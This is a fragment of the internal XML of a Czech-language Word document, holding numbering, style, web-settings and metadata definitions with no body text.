      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1134"/>
        </w:tabs>
        <w:ind w:left="567" w:hanging="227"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="upperRoman"/>
      <w:pStyle w:val="Nadpis2"/>
      <w:lvlText w:val="%1.%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1134"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E6378BD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8974A204"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="2"/>
      <w:numFmt w:val="upperRoman"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="upp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4A03F12"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="94609A0E"/>
    <w:lvl w:ilvl="0" w:tplc="1A3E04F8">
      <w:start w:val="1"/>
      <w:numFmt w:val="upperRoman"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="righ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6FE0F37"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8FF8C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E3AE3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A1CEE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930D71"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9D321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C950B6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="47027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7E7E24"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3B4A08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BA47429"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3086E8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23341023">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="852377884">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="856236304">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="664286676">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="822311795">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1327170904">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1555579793">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="30689541">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="780880135">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="878663087">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="782189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EC"/>
    <w:rsid w:val="00013512"/>
    <w:rsid w:val="0005007B"/>
    <w:rsid w:val="000822CD"/>
    <w:rsid w:val="000D37FF"/>
    <w:rsid w:val="000E4D78"/>
    <w:rsid w:val="001760A9"/>
    <w:rsid w:val="0018607D"/>
    <w:rsid w:val="001919B9"/>
    <w:rsid w:val="001920A6"/>
    <w:rsid w:val="001C37EC"/>
    <w:rsid w:val="002005CC"/>
    <w:rsid w:val="002175C6"/>
    <w:rsid w:val="00255214"/>
    <w:rsid w:val="002645A8"/>
    <w:rsid w:val="00272002"/>
    <w:rsid w:val="00291EF1"/>
    <w:rsid w:val="002E7FDA"/>
    <w:rsid w:val="002F739E"/>
    <w:rsid w:val="003340BC"/>
    <w:rsid w:val="003863DE"/>
    <w:rsid w:val="003A3F39"/>
    <w:rsid w:val="003D58FA"/>
    <w:rsid w:val="004110CB"/>
    <w:rsid w:val="00435BF0"/>
    <w:rsid w:val="00445C19"/>
    <w:rsid w:val="00461B5C"/>
    <w:rsid w:val="004961CC"/>
    <w:rsid w:val="004B7C4B"/>
    <w:rsid w:val="004E787E"/>
    <w:rsid w:val="004F1C11"/>
    <w:rsid w:val="004F74DF"/>
    <w:rsid w:val="00502B5B"/>
    <w:rsid w:val="00510861"/>
    <w:rsid w:val="00515F52"/>
    <w:rsid w:val="0052562B"/>
    <w:rsid w:val="0053323C"/>
    <w:rsid w:val="0053718D"/>
    <w:rsid w:val="00554424"/>
    <w:rsid w:val="0056082B"/>
    <w:rsid w:val="005719D7"/>
    <w:rsid w:val="005742A6"/>
    <w:rsid w:val="00576ED1"/>
    <w:rsid w:val="0058475B"/>
    <w:rsid w:val="005A3A91"/>
    <w:rsid w:val="005B7B70"/>
    <w:rsid w:val="005F1BE5"/>
    <w:rsid w:val="005F5F5F"/>
    <w:rsid w:val="006048A4"/>
    <w:rsid w:val="00613236"/>
    <w:rsid w:val="006151B4"/>
    <w:rsid w:val="006352AF"/>
    <w:rsid w:val="0065705F"/>
    <w:rsid w:val="006B2D40"/>
    <w:rsid w:val="006C03B0"/>
    <w:rsid w:val="006C48DE"/>
    <w:rsid w:val="006C64F0"/>
    <w:rsid w:val="006F5A60"/>
    <w:rsid w:val="00721B5B"/>
    <w:rsid w:val="00730567"/>
    <w:rsid w:val="00737915"/>
    <w:rsid w:val="0074287A"/>
    <w:rsid w:val="00761D04"/>
    <w:rsid w:val="00776D4A"/>
    <w:rsid w:val="00794CD0"/>
    <w:rsid w:val="007A0E32"/>
    <w:rsid w:val="007A7AFC"/>
    <w:rsid w:val="007B1AF0"/>
    <w:rsid w:val="007D5120"/>
    <w:rsid w:val="007D564D"/>
    <w:rsid w:val="007D65ED"/>
    <w:rsid w:val="007E71DA"/>
    <w:rsid w:val="00811192"/>
    <w:rsid w:val="0082559F"/>
    <w:rsid w:val="008263FC"/>
    <w:rsid w:val="00853667"/>
    <w:rsid w:val="00862D29"/>
    <w:rsid w:val="00874BC4"/>
    <w:rsid w:val="008956A1"/>
    <w:rsid w:val="00903D32"/>
    <w:rsid w:val="009546A0"/>
    <w:rsid w:val="00990826"/>
    <w:rsid w:val="00995548"/>
    <w:rsid w:val="0099766F"/>
    <w:rsid w:val="009A7081"/>
    <w:rsid w:val="009F4B40"/>
    <w:rsid w:val="00A108D3"/>
    <w:rsid w:val="00A24543"/>
    <w:rsid w:val="00A54434"/>
    <w:rsid w:val="00A842EC"/>
    <w:rsid w:val="00A84B1D"/>
    <w:rsid w:val="00AD3839"/>
    <w:rsid w:val="00AE52D9"/>
    <w:rsid w:val="00B211BB"/>
    <w:rsid w:val="00B30118"/>
    <w:rsid w:val="00B3410E"/>
    <w:rsid w:val="00B43D04"/>
    <w:rsid w:val="00B776D8"/>
    <w:rsid w:val="00B82576"/>
    <w:rsid w:val="00BB179D"/>
    <w:rsid w:val="00BB5B89"/>
    <w:rsid w:val="00BC7A01"/>
    <w:rsid w:val="00BD4C0E"/>
    <w:rsid w:val="00BF523A"/>
    <w:rsid w:val="00C26F96"/>
    <w:rsid w:val="00C824AF"/>
    <w:rsid w:val="00C97486"/>
    <w:rsid w:val="00D16169"/>
    <w:rsid w:val="00D5012C"/>
    <w:rsid w:val="00D51115"/>
    <w:rsid w:val="00D9392D"/>
    <w:rsid w:val="00DA0D9F"/>
    <w:rsid w:val="00DA1F83"/>
    <w:rsid w:val="00DD0707"/>
    <w:rsid w:val="00DE3382"/>
    <w:rsid w:val="00E02AA4"/>
    <w:rsid w:val="00E35FC7"/>
    <w:rsid w:val="00E83EAE"/>
    <w:rsid w:val="00E8478D"/>
    <w:rsid w:val="00EB0F0F"/>
    <w:rsid w:val="00EC044D"/>
    <w:rsid w:val="00ED1022"/>
    <w:rsid w:val="00EE0720"/>
    <w:rsid w:val="00EF6A32"/>
    <w:rsid w:val="00F549B2"/>
    <w:rsid w:val="00F54EE6"/>
    <w:rsid w:val="00FA1774"/>
    <w:rsid w:val="00FB2B66"/>
    <w:rsid w:val="00FC6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2BB"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{EE3D0473-E117-4337-81B7-7425C8026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776D8"/>
    <w:pPr>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:lang w:val="cs-CZ"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Nadpis1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normln"/>
    <w:next w:val="Normln"/>
    <w:link w:val="Nadpis1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00D16169"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:numId w:val="8"/>
      </w:numPr>
      <w:spacing w:before="360" w:after="80"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="40"/>
      <w:szCs w:val="40"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Nadpis2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Nadpis1"/>
    <w:next w:val="Normln"/>
    <w:link w:val="Nadpis2Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="007D564D"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="1"/>
      </w:numPr>
      <w:spacing w:before="120"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Nadpis3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normln"/>
    <w:next w:val="Normln"/>
    <w:link w:val="Nadpis3Char"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="001C37EC"/>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1C37EC"/>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1C37EC"/>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1C37EC"/>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1C37EC"/>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1C37EC"/>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1C37EC"/>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D1022"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cstheme="majorBidi"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="40"/>
      <w:szCs w:val="40"/>
      <w:lang w:val="cs-CZ"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Nadpis2Char">
    <w:name w:val="Nadpis 2 Char"/>
    <w:basedOn w:val="Standardnpsmoodstavce"/>
    <w:link w:val="Nadpis2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="007D564D"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cstheme="majorBidi"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
      <w:lang w:val="cs-CZ"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Nadpis3Char">
    <w:name w:val="Nadpis 3 Char"/>
    <w:basedOn w:val="Standardnpsmoodstavce"/>
    <w:link w:val="Nadpis3"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="001C37EC"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
      <w:lang w:val="cs-CZ"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Nadpis4Char">
    <w:name w:val="Nadpis 4 Char"/>
    <w:basedOn w:val="Standardnpsmoodstavce"/>
    <w:link w:val="Nadpis4"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="001C37EC"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:lang w:val="cs-CZ"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Nadpis5Char">
    <w:name w:val="Nadpis 5 Char"/>
    <w:basedOn w:val="Standardnpsmoodstavce"/>
    <w:link w:val="Nadpis5"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="001C37EC"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:lang w:val="cs-CZ"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Nadpis6Char">
    <w:name w:val="Nadpis 6 Char"/>
    <w:basedOn w:val="Standardnpsmoodstavce"/>
    <w:link w:val="Nadpis6"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="001C37EC"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
      <w:lang w:val="cs-CZ"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Nadpis7Char">
    <w:name w:val="Nadpis 7 Char"/>
    <w:basedOn w:val="Standardnpsmoodstavce"/>
    <w:link w:val="Nadpis7"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="001C37EC"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
      <w:lang w:val="cs-CZ"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Nadpis8Char">
    <w:name w:val="Nadpis 8 Char"/>
    <w:basedOn w:val="Standardnpsmoodstavce"/>
    <w:link w:val="Nadpis8"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="001C37EC"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
      <w:lang w:val="cs-CZ"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Nadpis9Char">
    <w:name w:val="Nadpis 9 Char"/>
    <w:basedOn w:val="Standardnpsmoodstavce"/>
    <w:link w:val="Nadpis9"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="001C37EC"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
      <w:lang w:val="cs-CZ"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Nzev">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normln"/>
    <w:next w:val="Normln"/>
    <w:link w:val="NzevChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00272002"/>
    <w:pPr>
      <w:spacing w:after="80" w:line="240" w:lineRule="auto"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:spacing w:val="-10"/>
      <w:kern w:val="28"/>
      <w:sz w:val="56"/>
      <w:szCs w:val="56"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="NzevChar">
    <w:name w:val="Název Char"/>
    <w:basedOn w:val="Standardnpsmoodstavce"/>
    <w:link w:val="Nzev"/>
    <w:uiPriority w:val="10"/>
    <w:rsid w:val="00272002"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cstheme="majorBidi"/>
      <w:spacing w:val="-10"/>
      <w:kern w:val="28"/>
      <w:sz w:val="56"/>
      <w:szCs w:val="56"/>
      <w:lang w:val="cs-CZ"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Podnadpis">
    <w:name w:val="Subtitle"/>
    <w:basedOn w:val="Normln"/>
    <w:next w:val="Normln"/>
    <w:link w:val="PodnadpisChar"/>
    <w:uiPriority w:val="11"/>
    <w:qFormat/>
    <w:rsid w:val="001C37EC"/>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1C37EC"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
      <w:spacing w:val="15"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
      <w:lang w:val="cs-CZ"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Citt">
    <w:name w:val="Quote"/>
    <w:basedOn w:val="Normln"/>
    <w:next w:val="Normln"/>
    <w:link w:val="CittChar"/>
    <w:uiPriority w:val="29"/>
    <w:qFormat/>
    <w:rsid w:val="001C37EC"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CittChar">
    <w:name w:val="Citát Char"/>
    <w:basedOn w:val="Standardnpsmoodstavce"/>
    <w:link w:val="Citt"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="001C37EC"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
      <w:lang w:val="cs-CZ"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Odstavecseseznamem">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normln"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="001C37EC"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Zdraznnintenzivn">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="Standardnpsmoodstavce"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="001C37EC"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Vrazncitt">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normln"/>
    <w:next w:val="Normln"/>
    <w:link w:val="VrazncittChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="001C3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1C37EC"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:lang w:val="cs-CZ"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Odkazintenzivn">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="Standardnpsmoodstavce"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="001C37EC"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="typewrite">
    <w:name w:val="typewrite"/>
    <w:basedOn w:val="Normln"/>
    <w:link w:val="typewriteChar"/>
    <w:qFormat/>
    <w:rsid w:val="00ED1022"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="typewriteChar">
    <w:name w:val="typewrite Char"/>
    <w:basedOn w:val="Standardnpsmoodstavce"/>
    <w:link w:val="typewrite"/>
    <w:rsid w:val="00ED1022"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
      <w:lang w:val="cs-CZ"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hypertextovodkaz">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="Standardnpsmoodstavce"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D51115"/>
    <w:rPr>
      <w:color w:val="467886" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Nevyeenzmnka">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="Standardnpsmoodstavce"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D51115"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Zhlav">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normln"/>
    <w:link w:val="ZhlavChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="007E71D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71DA"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:lang w:val="cs-CZ"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Zpat">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normln"/>
    <w:link w:val="ZpatChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="007E71DA"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4536"/>
        <w:tab w:val="right" w:pos="9072"/>
      </w:tabs>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ZpatChar">
    <w:name w:val="Zápatí Char"/>
    <w:basedOn w:val="Standardnpsmoodstavce"/>
    <w:link w:val="Zpat"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="007E71DA"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>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090075">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1628588733">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1904371095">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="20780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5</Pages>
  <Words>1238</Words>
  <Characters>7305</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 Adam (231049)</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Hos Adam (231049)</cp:lastModifiedBy>
  <cp:revision>96</cp:revision>
  <cp:lastPrinted>2024-12-09T11:00:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-11-12T15:09:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-12-09T11:10:00Z</dcterms:modified>
</cp:coreProperties>
</file>